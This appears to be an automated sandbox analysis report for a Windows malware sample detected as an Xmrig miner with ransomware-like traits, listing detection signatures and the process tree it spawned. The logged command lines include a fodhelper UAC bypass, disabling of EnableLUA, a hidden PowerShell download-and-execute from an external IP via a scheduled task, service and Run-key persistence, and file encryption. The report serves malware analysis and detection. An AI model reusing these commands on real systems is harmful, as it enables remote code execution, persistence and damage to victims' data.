Windows
Analysis Report
jxatBamQnK
Overview
General Information
Detection
Xmrig
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Sigma detected: Schedule system process
Antivirus detection for URL or domain
Antivirus detection for dropped file
Sigma detected: Drops script at startup location
Yara detected Powershell download and execute
Snort IDS alert for network traffic
Sigma detected: Powershell Download and Execute IEX
Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for dropped file
Found strings related to Crypto-Mining
Uses cmd line tools excessively to alter registry or file data
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Powershell drops PE file
Drops script or batch files to the startup folder
Uses schtasks.exe or at.exe to add and modify task schedules
Creates an autostart registry key pointing to binary in C:\Windows
Suspicious powershell command line found
Machine Learning detection for dropped file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Creates a start menu entry (Start Menu\Programs\Startup)
Uses reg.exe to modify the Windows registry
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
PE file contains sections with non-standard names
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to communicate with device drivers
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Enables debug privileges
Installs a raw input device (often for capturing keystrokes)
Uses Microsoft's Enhanced Cryptographic Provider
Classification
- System is w10x64
jxatBamQnK.exe (PID: 6352 cmdline:
"C:\Users\ user\Deskt op\jxatBam QnK.exe" MD5: C44C67FBBD78AF44E4E75787E636E1FE) cmd.exe (PID: 6392 cmdline:
cmd.exe /C fodhelper .exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F) conhost.exe (PID: 6400 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) fodhelper.exe (PID: 6436 cmdline:
fodhelper. exe MD5: 1D1F9E564472A9698F1BE3F9FEB9864B) reg.exe (PID: 6484 cmdline:
"reg.exe" ADD HKLM\S OFTWARE\Mi crosoft\Wi ndows\Curr entVersion \Policies\ System /v EnableLUA /t REG_DWO RD /d 0 /f MD5: E3DACF0B31841FA02064B4457D44B357) conhost.exe (PID: 6496 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) schtasks.exe (PID: 6816 cmdline:
schtasks / create /tn Microsoft EdgeUpdate TaskMachin eCore1d78c cbc12c9456 /sc MINUT E /MO 1 /t r "powersh ell.exe -n op -w hidd en -exec b ypass -com mand iex(N ew-Object Net.WebCli ent).Downl oadString( \\\""http: //212.87.2 12.218/doa nlowd.txt\ \\"")" MD5: 838D346D1D28F00783B7A6C6BD03A0DA) conhost.exe (PID: 6836 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) Conhost.exe (PID: 944 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) schtasks.exe (PID: 6828 cmdline:
schtasks / run /tn Mi crosoftEdg eUpdateTas kMachineCo re1d78ccbc 12c9456 MD5: 838D346D1D28F00783B7A6C6BD03A0DA) conhost.exe (PID: 6852 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) sc.exe (PID: 6844 cmdline:
sc create msupdate b inpath= C: \Windows\T emp\C:\Win dows\Temp\ daemon.exe MD5: D79784553A9410D15E04766AAAB77CD6) conhost.exe (PID: 6904 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) sc.exe (PID: 6912 cmdline:
sc descrip tion msupd ate "Just For Test" MD5: D79784553A9410D15E04766AAAB77CD6) conhost.exe (PID: 7036 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) sc.exe (PID: 7028 cmdline:
sc config msupdate s tart= auto MD5: D79784553A9410D15E04766AAAB77CD6) conhost.exe (PID: 7052 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) net.exe (PID: 7060 cmdline:
net start msupdate MD5: 15534275EDAABC58159DD0F8607A71E5) conhost.exe (PID: 3244 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) net1.exe (PID: 5716 cmdline:
C:\Windows \system32\ net1 start msupdate MD5: AF569DE92AB6C1B9C681AF1E799F9983) reg.exe (PID: 7164 cmdline:
reg add HK LM\SOFTWAR E\Microsof t\Windows\ CurrentVer sion\Run / v registry KeyName /t REG_SZ /d C:\Window s\Temp\dae mon.exe /f MD5: E3DACF0B31841FA02064B4457D44B357) conhost.exe (PID: 5028 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) reg.exe (PID: 3852 cmdline:
reg add HK EY_CURRENT _USER\Soft ware\Micro soft\Windo ws\Current Version\Ru n /v regis tryKeyName /t REG_SZ /d C:\Win dows\Temp\ daemon.exe /f MD5: E3DACF0B31841FA02064B4457D44B357) conhost.exe (PID: 1008 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) reg.exe (PID: 4040 cmdline:
reg add HK EY_LOCAL_M ACHINE\SOF TWARE\Micr osoft\Wind ows\Curren tVersion\R un /v regi stryKeyNam e /t REG_S Z /d C:\Wi ndows\Temp \daemon.ex e /f MD5: E3DACF0B31841FA02064B4457D44B357) conhost.exe (PID: 4712 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) WMIC.exe (PID: 6424 cmdline:
wmic proce ss get exe cutablepat h MD5: EC80E603E0090B3AC3C1234C2BA43A0F) conhost.exe (PID: 6540 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) findstr.exe (PID: 4584 cmdline:
findstr en crypt.exe MD5: BCC8F29B929DABF5489C9BE6587FF66D) conhost.exe (PID: 2952 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) Conhost.exe (PID: 1152 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) encrypt.exe (PID: 6660 cmdline:
C:\Windows \Temp\encr ypt.exe MD5: 9996CC802C43F6FFE4065A514585C209) cmd.exe (PID: 1880 cmdline:
cmd /C sta rt /b C:/W indows/Tem p/rar.exe a -df -m0 -mt10 -ep -hpMInGZq5 0krQkY8Ldh H8K9M8YsZL qe1bCDBYaL yDr5qtHaQx oCmumisNfQ zcqvnICm1V D0JjlTxWou 0w8I3457uW Afn14FpE8V DJ9 "C:/Sy stem Volum e Informat ion/ORZGCY 3LNFXGOLTM N5TQ====.r ar1" "C:/S ystem Volu me Informa tion/ORZGC Y3LNFXGOLT MN5TQ====" MD5: 4E2ACF4F8A396486AB4268C94A6A245F) conhost.exe (PID: 6516 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)